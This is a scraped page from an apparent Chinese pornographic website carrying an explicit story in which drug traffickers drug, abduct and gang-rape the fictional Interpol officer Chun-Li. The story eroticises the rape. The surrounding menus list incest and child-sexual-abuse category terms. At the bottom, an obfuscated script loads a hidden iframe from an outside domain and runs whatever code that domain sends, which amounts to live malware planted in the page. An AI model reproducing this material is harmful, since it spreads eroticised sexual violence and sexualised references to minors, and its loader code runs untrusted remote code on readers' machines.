视频一区 最新列表
国产情侣制服师生强奸乱伦欧美性爱国产偷拍中文字幕亚洲情色亚洲无码
视频二区 最新列表
女神学生 水果派 国模私拍 抖阴视频 主播大秀 精品三级 福利姬 国产精品
视频三区 最新列表
职场同事 野合车震 自慰群交 国产乱伦 空姐模特 娇妻素人 美熟少妇 颜射瞬间
视频四区 最新列表
乱伦中文 巨乳中文 强奸中文 精品短视频 无码中文 小鸟酱专题 网曝门事件 国产名人
视频五区 最新列表
sm群P 自慰口交 动漫精品 日韩无码 出轨中文 调教中文 人妻中文 制服中文
视频六区 最新列表
制服无码 人妻无码 强奸无码 乱伦无码 巨乳师生
辣文小说 最新列表
激情图片 情色小说
国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
厌恶的骚味
2021-04-15 22:11:56

在一层的一个房间里,四个男子关着灯窃窃私语。
“老大,再有两天咱们就到了吧,这回可做了票大的,我能分多少”
其中一个猥琐的年轻人问道,语气中掩饰不住兴奋。
“沉住气”被称作老大的是一名健壮的中年人不满的皱起眉头,
低声呵斥到:“闻着点腥味就上窜下跳成的什幺\事,早晚了帐,
别他妈连累了我们”
“是”年轻人畏惧地缩了缩头,不再说话。
“他也是年轻心急,老大别生气”帮边一个光头为年轻人解围
道“秀才,就你丫鬼点子多,你觉得这次怎幺\样”
帮边被称作“秀才”的带眼睛的青年托着下巴,略微出神地看着窗外,
没有搭腔
“秀才、秀才”光头不耐烦地叫道
“阿”秀才仿佛被惊醒,低声说道“我觉得有点不对劲儿”
“怎幺\”
“我觉得两天前就有人开始跟着我们,会不会是条子”
“可是我们每次停车,都注意了,没有可疑的车辆阿”
“这才是我害怕的,我总觉得有一双眼睛盯着我们”
“你丫做贼心虚吧”光头不满地说道
老大一个手势製止光头的抱怨,思忖了片刻,说道:“小心驶得万年船,我们走”
“什幺\,外面天寒地冻地”年轻人不满地叫道
“花蛇,老大这幺\做有道理,这是打草惊蛇阿,怎幺\这幺\一走,
条子跟不跟上可就犯了难,要是不跟还则罢了,要是跟上,凭咱们的手段
包他们一百个来一百个死”说着,秀才脸上现出于自己清秀外貌不相称的凶狠来。
不远处的一间房间的里间,一名女子凭窗冷冷地注视着四人的房间,
皎洁的月光勾勒出女子娇好的身材,白皙的肌肤仿佛温润的玉脂,将
周围的黑暗驱散,薄薄的丝织睡衣下,两个丰满的乳房隐隐可见,
睡衣下摆下两条修长结实的双腿伸出,交叠着搭在椅子上,两只玉足无意
识地拍打着椅背。
猛地,这名女子回头看向门口,现出秀丽端庄的面容来。
“碰”的一声,里间的房门被推开,一名瘦小的男子沖了进来。
“阿”这名女子迅速抓起身边的衣服挡在胸前,厌恶地说道“老李,怎幺\不敲门就进来”
“春丽警官,目标好像要走”被称作老李的人连忙侧过身,
只是眼角的余光却一刻不离对方诱人的胴体。
这名女子正是威名赫赫的国际刑警春丽,她身怀绝技,心思缜密,
在世界搏击大赛上一战成名,加之绝美的容颜和傲人的身材,很快成为大
众的偶像。然而在警界内部,大家都知道她绝不是一个花瓶,
在她手上破获的案件无论质量还是数量都创下了同年龄段的记录,
可说是拥有华丽实绩的出色一线指挥官。
春丽闻言,脸上厌恶之情褪去,两条峨眉微微皱起,
贝齿轻轻咬住下嘴唇,披衣站在窗前,陷入沉思。眼前跟
蹤的四个人在道上成名已久,这次相信他们将要接一大单,
自己追蹤他们已一年有余,本拟今次在他们交易时一举将其擒获,
更要顺藤摸瓜 卡断这个主要毒品来源,顾忌到对手狡猾老脸,
自己将干警都布置在毒贩10KM以外,由各地警方派出车辆载着
自己亲自进行跟蹤,他们夜晚突然离去,若不跟蹤毒贩和可能就此潜逃,
若要跟蹤必然会被发觉,一旦动手,己方的实力又......
想到此处,春丽回头看向李爽,不禁气苦。
从春丽转身起,李爽眼睛就开始毫无遮拦地蹂躏着春丽的身体,
洁白光滑的背部,浑圆优美的小腿,更令他兴奋的是高根拖鞋中的纤纤玉
足,青葱般的玉趾、曲线优美的脚掌和圆润的脚踝,
刺激的李爽几乎要扑上前去狠狠猥亵身前的美人,他一脸色相却被春丽看个正着。
“李警官”一声断喝把李爽从无边遐思中惊醒,连忙讨好道;
“纵然这些瘪三费尽心机也逃不出你的掌握,我看不如叫后面的
大队上来,再让前面的人截击,不然他们垂死挣扎,咱们......”
李爽知道毒贩大多为亡R之徒,自己平时在小混混面前耍威风倒可,
这种场面怕是要了帐,因而不禁生了怯意
“截击?怎幺\截击,这附近有许多城市,若毒贩到城里换车,
我们怎幺\跟蹤”春丽瞬间洞悉了对方的用意,加之他前面对自己不恭,
对他已是厌恶已极,一挥手命令道:
“李警官,你留在这里迅速联络大部队,我跟上去,保持通话联係,
我想这个工作李警官努力后应该可以胜任吧,好了,你出去,我要準备一下”
虽然被春丽毫不客气的抢白和嘲讽,但是能够不面对毒贩还是让
李爽很轻松,于是他只是诺诺连声地退出去,只是在门外,
他才小声的诅咒道:
“臭婊子,你就威风,要是有一天我能干了你,非干死你”
房饭的春丽,迅速将头髮盘成两个发髻,换上了亮蓝色紧身运动衣,
胸口的两条黄色的花纹正好勾勒衬托出两个丰满的乳房,接着换上轻便
的运动鞋,绰起手枪,别在后腰沖出了房间。(此处打扮请参照SF2)
几分锺后,两辆汽车先后沖出黑暗,向前驶去,渐渐的路旁的景物逐渐
荒凉起来,春丽的汽车再也不能掩饰自己的行迹,正当春丽在犹豫
是否上前抓捕的时候,忽然前面的面包车后溉齐摇开,
两人持枪向后射击起来,此时不容春丽犹豫,决心先抓住眼前四人再说,
于是立刻拔枪回射,双方连打带跑又走了几百米,两名毒贩先后中枪,
没了火力掩护,小面包接连中弹,一个急?停在路边,接着三人分散逃开。
春丽持枪下车,紧追上去,透过破碎的后车窗,看到一人浑身是血,
躺在后座,另外三人正快速向路边小山坡攀爬。
春丽大喝一声“站住不然开枪了”说着瞄準了左侧一人大腿,
扣动了扳机,然而代替枪声的却是“咯”的一声脆响,子弹卡壳了。
逃亡的三人见状,立时?住身形,为首的老大凶相毕露,
叫道“就一个婊子,有没有家伙,大家料理了她”
“老大,不如抓了她,大家乐乐”花蛇在一旁搭腔。
“别废话,先动手”旁边的光头,左肩上一片血迹,
显然受了枪伤,只是他凶悍已极,竟然第一个沖了上来。
光头沖到面前,右拳直取春丽头部,春丽扔了手枪,
侧头躲过,身子欺近,俯身一掌排中光头腹部,
光头大叫一声,被打得连退四五步。
旁边的花蛇掏出一把小刀,直插春丽胸口,春丽侧身躲过,
接着花蛇反手一刀直取春丽下体,春丽叫声“好不要脸”,
拧身躲开,接着右腿连续踢出,?那间连攻十数脚,仿佛一时
有百十腿影将花蛇罩住,正是她成名招式“百裂脚”,
花蛇自是将十几脚照单全收,一声惨叫,飞将出去。
老大见状,挺身向前,一招黑虎掏心直取春丽,春丽侧身闪时,
又是一记横扫千军,两招快速有力,显然有些功\底,
春丽身体一矮仿佛滑倒,却是单手撑地,一脚扫向老大下盘,
老大哪里闪避得了,顿时摔倒在地。
甫一照面三人虽然各吃了大亏,却依然奋勇向前,一齐攻上,
春丽不愿硬拼,先向后退去,依靠面包车搏斗,三人自以为得志,
发一声喊,一齐扑上,春丽猛地一个高跳,在空中翻个跟头,
直落三人中间,双手一撑地,两腿旋风般旋转起来,
三人脸颊上顿时吃了一记旋风踢,眼前一黑,飞将出去。
春丽一个倒翻站起,对着地上哀叫连连的三人笑道
“这招倒打旋风腿味道可好”,
说着去拣地上的手枪,刚刚站起,春丽只觉一股异香扑鼻,
接着感到一阵眩晕。春丽暗叫不好,急退向后,却一下撞入
身后一人怀抱,身后那人作声拦腰抱住春丽,死死按住她两臂,
右手握住一块棉布,紧紧按在春丽口鼻上。春丽只觉一阵甜香刺鼻,
接着一阵无力感布满全身,“麻醉剂”春丽一声惊叫,又吸进一口。
春丽屏息用力挣动,力量消退的自己却不能撼动对方,
眼见地上三人渐渐爬起,春丽右足急踏,狠狠踩中身后那人脚面,
若是平时的春丽配合自己常穿的半高腰靴,这一下对方的脚骨必定断裂,
而现在只是让他吃痛放开自己。春丽一脱开怀抱,立时一脚后踢,
踏中那人胸口,借势身体向前,途中一个转身,一个旋风踢正中沖上来的
老大肋下,只是力道已然大不如前,老大忍痛夹住春丽左腿,右手探出,
狠狠击在春丽两腿之间,春丽一声惨叫,力道洩了一半,光头跟上脚下横扫,
春丽立时被放倒在地,花蛇立刻扑上前去,双手死死按住了春丽的手腕,
接着那块棉布又被按在了春丽脸上。
春丽屏住呼吸,拼命挣动,花蛇压在春丽身上,头脸却埋在她的胸前,
随着春丽的挣动,丰满的双峰一再地摩擦着花蛇的脸膛,
春丽羞得粉面通红,花蛇却是一脸的享受。
“快,这婊子在憋气,让他吸气”老大叫道。
花蛇低下头去一口咬住了春丽一边的乳房,隔着衣物,
拼命的又咬又舔,春丽羞得一声闷喝,又吸入了许多气体,
抵抗逐渐微弱。
光头跨上来说“看我的。”说着伸出右手食指,狠狠捅向春丽两腿之间,
此时春丽左腿被老大高高夹住,两腿大大劈开,毫无抵抗力,
食指隔着裤子竟然一下捅入春丽的玉门,春丽且羞且怒,一声惊叫,
又吸了一大口气体,身子一软,彻底地堕入黑暗之中。
望着春丽柔软无力的身体,老大狠狠说道:“妈的,这婊子真扎手,
要不是有秀才的妙计,咱们四个今儿可都要栽了”原来刚才出手袭击
春丽的正是秀才,他并未中枪,只是用了光头的血迹,伪装中弹,
此时奇兵突起,奠定了胜局。秀才笑了笑,俯身把春丽的头放在自己大腿上,
慢慢移去了棉布,
说道“咱们的赶紧撤走,看着警妞身手就知道来头不简单,我看......”
蓦地,秀才喉头仿佛被什幺\东西扼住,眼睛直勾勾看着月光下春丽秀美的面容,
缓缓说道“这是,这是......”
“是春丽!”花蛇惊叫道,接着一脸淫笑,手上加力,狠狠地捏了一下春丽的乳房。
如果春丽醒着一定会后悔参加全球搏击大赛,要知道对于黑道的人物来说,
那是他们最爱的节目,而那些美女格斗家也自然是他们永远第一位的性幻想对象。
“这下咱们赚了。”光头走过来猥亵地用手摸着
春丽被架起的左腿,说:“老子这一枪也没白挨”
“待会儿你还她几枪好了”花蛇猥琐地笑道。
秀才一边用右手从春丽腋下传出抚摸她的右乳,一边说道:“老大,此地不宜久留......”
正说话,远处拐弯一束灯光亮起,接着一辆汽车向这边开来。
秀才眼珠转了转,站起对同伴肇两句,老大点点头,走向公路,
拦住了汽车。汽车行近,却是一辆厢如卡,看到这种情况,司机一愣,
接着拉开车门骂道“你丫找死......”后半句的话语便永远留在了他的嘴里,
因为光头从另一侧摸上来,扼住了司机的喉管。
老大扛起昏迷的春丽,一边对肩上的美肉上下其手,一边登上了小卡的后车厢,
不一会儿三辆汽车先后驶去,暗夜,刚刚过了一半,而对于春丽,这才是开始。
2
寂静的黑暗被一束灯光划破,一辆厢如卡飞快地驶在盘山道上,驾驶座上
花蛇一脸不高兴地开着车,时不时回头望去,透过车窗,可以看到车厢内
春色无边的一幕正在上演。三名男子成品字型坐在城厢地闆上,
中间躺着的便是昏迷不醒的国际女刑警春丽,紧身的运动衣虽然还完好无损,
只是胸前鹿在三人反複舔弄下,留下了大片水渍,再加之春丽为了格斗方便
没带乳罩,两个乳房的形状清晰可见,薄薄的宝蓝色衣料下更有两粒坚挺的凸
起引人遐思,一双矫健有力的美腿如今软绵绵地被秃头和秀才一人一个架在肩头,
大大地打开,秃头的右手不断隔着衣服抚摸、撩拨着春丽的玉门,
一边淫笑一边喊道:
“秀才真他妈有一套,将咱们和这娘们的车摔在桥下,
更让那卡车死机做了替死鬼,条子绝想不到咱们开了卡车走,
这就叫金单脱壳。这娘们儿我早就想上了,这回可要玩个够”
“那是金蝉,条子也都不是傻子,她出事,国际刑警肯定要介入,
咱们还得小心”秀才笑着说,开始脱去春丽的跑鞋,一双娇小匀称的玉足立时
呈现在眼前,在洁白的短袜映衬下更显玲珑可爱,秀才一把抓住,细细把玩起来。
“这次秀才立了大功\,你第一个上这婊子”老大一边说着,一边使劲揉捏着
春丽的乳房,惹得昏迷中的春丽发出几声呻吟,只是在这三人听上去更像是挑逗,
体内更是激情难耐。
“老大还是你来吧,只是她快醒了,先给她带上铐子”秀才说着,递上了春丽
自己的手铐,随着一声轻响,春丽的双手被紧紧铐住,老大本已垂涎春丽美色多时,
见秀才推让,立刻俯下身子,对着春丽的双唇狠狠地亲了上去,同时将春丽绰在怀里,
接着两手一分,将春丽运动衣的前襟一下扯开,两个饱满的乳房立时从破碎的衣物下
跳跃出来,粉红的乳头在昏暗的车厢内格外显眼。
老大毫不客气的一手捏住右乳,一边粗鲁地亲吻着不幸的国际女刑警,
一边翻身压在春丽身上,右手向下狠劲地撕扒着运动裤,一旁的秃头、
秀才也一齐帮忙,七手八脚地将裤子扒了下来,紧接着春丽白花花的美腿又被
大大分开,露出了两腿间白色的狭小内裤。
老大最后恶狠狠地亲了一下春丽,抬起头叫道“妈的,今天才知道亲嘴的味道,
以前算是白亲了。”说着两手滑向春丽股间,就要扯落最后的障碍。
“哦......”
随着一声呻吟,春丽秀眉微动,渐渐醒来,浑浑噩噩间只觉得胸腹逶感沉闷,
秃头在旁边大笑道:
“醒的真是时候,不过待会老子非得把你干晕过去”说着伸出一只手,
猛揉春丽的左乳,春丽吃痛一声惊呼,睁开双眼,映入眼帘的却是三张淫笑的面孔,
低头一看,自己双峰正被魔爪蹂躏。秀才刚要说话,岂料春丽惊怒之下,双腿用力,
甩开秀才、秃头的控製,两脚分别踢中二人,接着双腿回摆,一下琐住老大的脖项,
老大一挣之下竟未挣脱,眼看春丽就要发力扭断老大脖子,
忽然惨呼一声,身子却已瘫倒。原来老大猝见惊变,慌乱中两手依然顺势机械地将
内裤褪下,当玉腿加颈之时,急中生智,食指一捅,竟然破门而入,插进了春丽的花径内。
最脆弱的地方蓦地被敌人攻击,春丽顿时失去了力量,三人趁机扳回了局势,
将她死死压住,春丽只好破口大骂:“你们这些混蛋,快放开我,这是袭警......”
“我知道,我们还要强姦,不,轮姦你哩”老大恶狠狠地说道,
边说边褪下自己的裤子,粗大的阳具昂然而出,对準了玉门,
同时左手拨弄着两片阴唇,露出了粉红色的阴道。“操,真他妈嫩,那些鸡哪个比的了,
肯定没怎幺\用过。”
“别难过,咱们待会肯定给你补上这些年损失”秀才阴沉地说道,三人又是一阵淫笑。
听到三人拿自己与妓女相比,愤怒的春丽一边拼命的挣动,一边大声喝骂,
只是褪至腿弯的内裤阻碍了挣扎的力度。
老大一声冷笑,双手各抓住春丽的一个脚踝,一把将春丽两腿举起,秀才心领神会,
上前将内裤扯脱,一把塞入春丽口中,
说道:“春警官,您省省力气,待会哥几个伺候你的时候,你再好好叫床。”
春丽闻言,脸上羞愤的通红,只是一串串诅咒到了口边就变成了“呜呜呜”。
蓦地,春丽瞪圆双眼,猛烈的摇摆着身体,只因一个温热潮湿的东西侵入了她的阴道。
老大伏在春丽两腿间,右手一边玩弄着她的右乳,舌头则疯狂地肆虐着她的玉穴,
左手也对着两片丰美的阴唇上下其手。秃头在旁边一边用两个手指捏住春丽的乳头把玩,
一边说道:“老大,味道怎幺\样。”
老大头也不抬地含糊说道:“好......好”
确实,春丽的玉穴,不但绝无半点腥骚之气,反而有股淡淡的体香,
玉径内壁更是温暖柔软,实在是不可多得的佳品。
老大舔弄一阵,虽然颇为享受,只是春丽玉门内除了自己的唾液,似乎并无多少体液
渗出。老大怒道“操,老子这幺\伺候你,你丫倒装起玉女来了,该你伺候老子了”
说着将自己的阳具顶在了春丽玉门外。
“来,听听咱们春警官有什幺\说的”秀才笑着将春丽口中的内裤取出。
“混蛋,我绝不放过你们的......阿”春丽甫一张口,便是一连串怒骂,
老大却不待她说完,说道“废话少说,还是让老子的老二来发言罢”,
接着挺枪向前,粗大的龟头一下顶开两片阴唇,挤入了阴道,将春丽后面的诅咒
变成了一声惨叫,老大拼命地耸动屁股,粗大的阳具终于横沖直撞地完全进入
春丽窄小紧密的阴道,柔嫩的肉壁立刻紧紧缠绕在阳具的周围,
仿佛万千的小手一齐对它进行按摩。
“我操,真他妈紧,爽歪了”老大大呼一声,将阳具退回洞口,再次全力沖刺,
“噢......”春丽优势一声惨叫
“对,对,使劲叫,叫好哥哥干我”旁边的秃头淫笑着叫道。春丽闻言,
立刻闭紧嘴巴,狠狠地盯着三人,若是目光可以杀人,只怕三人早已粉身碎骨。
“操,还跟我耍狠,老子非把你操的叫春不可”老大说着,立即加快频率,
仿佛打桩机一样狠狠地抽插起来。春丽再也不能维持冰冷的表情,两条蛾眉纠缠
在一起,皓齿紧紧咬住下嘴唇,两眼紧闭,承受着老大的肆虐。
老大狠狠抽孳4、5分锺,眼见春丽下嘴唇几乎咬得渗出血来,脸色也苍白许多,
下体也渐渐觉得有体液流出,想来她是忍耐不住,于是更加一把力,疯狂的抽送起来,
想要将这天下闻名的女警奸至高潮,只是2、3分锺过去了,没有让春丽高潮,
老大自己却忍不住了,只见他“谑谑”连声,两眼上翻,忽然猛地抽出阳具,
一波精液立时喷薄而出,直射在春丽小荤上,接着是第二波、第三波,
不一会春丽平坦紧绷的小稜布惭汙秽的痕迹。
春丽感到老大将要射精,本拟大叫,只是看到老大抽出阳具,才硬生生忍住,
眼见老大的精液尽数射在自己小腹,脸上嫌恶之惜却夹着一丝不易觉察的安慰。
只是这一切都被秀才看在眼里。老大射精后无力地趴在春丽身上,意犹未尽地
抚摸着身下美妙的胴体,只是射精太快脸上有些挂不住,
嘴上狠狠地说:“妈的,真是小妖精,老子一不留神竟被她干倒了”
“她长得天仙似的,又是有名的警察,也难怪忍不住,等干习惯了
自然有您大显神威的时候”秀才笑着说道
“好,秀才该你了”老大有了台阶,又狠狠捏了一把春丽的乳房,退到一边。
秃头本来箕指望第二个上,却又惧怕老大威势,只得绰起春丽一条美腿,
将阳具在上面蹭来蹭去
秀才不急不徐地来到春丽身前,伸出两手攀上她傲人的双乳,
两指夹住粉红挺立的乳头,细细把玩,接着俯下头去,伸出舌头,
灵巧地在右乳乳头上打转,接着一口含住乳头,用牙轻轻的咬噬、咀嚼,
另一只手则垂下去,轻轻拨开大阴唇,找到阴核所在,温柔的爱抚、挑逗起来。
“操,秀才你丫就是麻烦,上次强姦的那娘们儿轮到你就用了小半小时
又亲又摸的,每次在你后面真他妈......”秃头不满地喊道,
但看到老大瞪了自己一眼,也就不敢作声,只得恨恨捏了春丽大腿一把。
秀才也不吱声,只是反複玩弄,挑逗着身下的美人。
渐渐地,春丽双颊飞上一股潮红,小嘴微张,呵气如兰,玉径内一股花蜜缓缓流出,
秀才得意地笑道:“我这招‘轻拢慢撚抹複挑’如何”
说着右手蘸了些花蜜,放入口中,“甜鹹适中,滴滴香浓,意犹未尽”
“你丫就别泛酸了”秃头忍不住又骂道。
“秃头,每次我玩完的女人,不都乖乖听任咱们地摆布了,
上次那女人等你上的时候,不是主动抱着你求欢?别得了便宜卖乖。”
说完看也不看窘迫的秃头,绰起春丽的脖项,狠狠吻了上去。
“阿!”秀才突然触电般地跳起来,嘴上已然留下了两粒齿痕,渗出的鲜血
让秀才的面孔一下变得狰狞起来,春丽毫不畏惧地瞪着秀才,嘴角还留着一丝血迹,
刚才本已略显迷离的眼神重新变得坚韧起来。
一时车厢内陷入寂静,只有秃头脸上挂着幸灾乐祸地笑容。
”哈哈,好”忽地秀才笑了起来,接着双手离开乳峰,一下绰起春丽的双腿,
春丽身体立刻剧烈震动起来,竭力想挣脱对方的摆布,只是刚才老大的姦淫消耗
了春丽大量的体力,再加之双手被铐在身后,几次挣扎后终究被秀才按住,
秀才冷笑一声,下身一顶,阳具破门而入。
春丽羞怒之下,索性闭上眼睛,默默承受着对方的姦淫。秀才的抽插却不同于老大
的一味突进,有深有浅,有快有慢,显然是竭力挑逗春丽,希望把她奸上高潮来找回场子。
姦淫整整持续了20分锺,春丽依然毫无反应,只是玉径的内壁却开始本能的蠕动、收缩,
仿佛在主动爱抚、套弄着秀才的阴茎,秀才只觉下身快感如潮,
连忙放缓了抽动频率,伸出手来,扬手打了春丽一记耳光。
春丽睁眼怒视秀才,两腿一阵挣扎,秀才控製住春丽的双腿,阴沉地说道:
“春大警官,你既然被咱们几个操了,不如咱几个都给你下上种,生个孩子看看像谁?”
“阿”秀才话一出口,春丽只觉眼前一黑,一声惊呼脱口而出,
接着语无伦次地说道:“不要,不要,你们都已经对我这......这样了,
还要如何.......”说道后来,语调却已低沉软弱。
“当然是射在你的小穴里阿”旁边的老大和秃头一齐叫道。
看到刚刚还倔强无比的女警在自己恫吓下,突然间流露出小女儿态,
秀才自觉诲出的畅快,缓缓说道:
“如果不射,倒也可以,只不过要你答应个事情......”
春丽看到事情有转机,小声问道“答应什幺\”
“你刚才咬了我一口,现下我老二可要找回场子,也要你的樱桃小口服侍,嘿嘿”
“呸,白日做梦”春丽怒骂道,被自己追捕的罪犯强姦已然令她羞愤难当,
现在他们竟然要她口交。
“既然春大警官不赏脸,那幺\就让你下面的小口接着咱的子孙吧”说着秀才
又开始抽插起来,嘴上更是“恩阿”个不停,随着速度加快,
秀才大喝道“要......要出来了”
“不”春丽忽然叫道,“我答、答应你,不要射在里面”秀才闻言立刻停了下来,
坏笑地问:“答应什幺\?”春丽瞪了他一眼,把头甩在一边,低声说道:
“用......用......用嘴”
秀才扳过头,盯着春丽的双眼,恶狠狠地说:“说我为你口交,快说”
春丽只是对他怒目而视,嘴唇几次翕动,却没用回答,秀才挺动了一下下体,
“快说”
春丽喝道:“我答应你,你可不能不受信用,要来就来,我不会说的”
秀才也怕闹僵,于是笑道:“好,咱说到做到”俯下身去,吻向春丽,
这次春丽却未反抗,只是紧闭双唇,不让秀才的舌头顶入口中。
良久,秀才拔出阴茎,和老大、秃头将春丽摆弄到跪在自己面前,
由二人按住肩膀,接着自己右手扶着阳具,贴在了春丽朱红的双唇上,
虽然自己已然答应口交,只是事到临头春丽依然难以接受,秀才见状,
也不着急只是用自己的阳具在绝美的脸蛋上蹭来蹭去,不一会春丽的鼻翼、
脸颊都留下了闪闪发亮的痕迹。

  • 1
  • 底部
    国产原创 成人交友 疯狂野战 户外打炮 少妇约炮 中出直播 母子乱伦 萝莉cos 同城约啪
    极品直播 秘密入口 内射表姐 空姐自慰 强制颜射 酒店三P 剧情迷奸 幼女大全 爆操萝莉
    亚洲精品 国产偷拍 无码视频 经典三级 少妇约炮 人妻中出 母子乱伦 萝莉资源 不卡秒播
    中文字幕 幼女破处 亚洲专区 日韩精品 制服诱惑 偷拍自拍 剧情迷奸 三级自慰 高清秒播
    联盟:
    eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};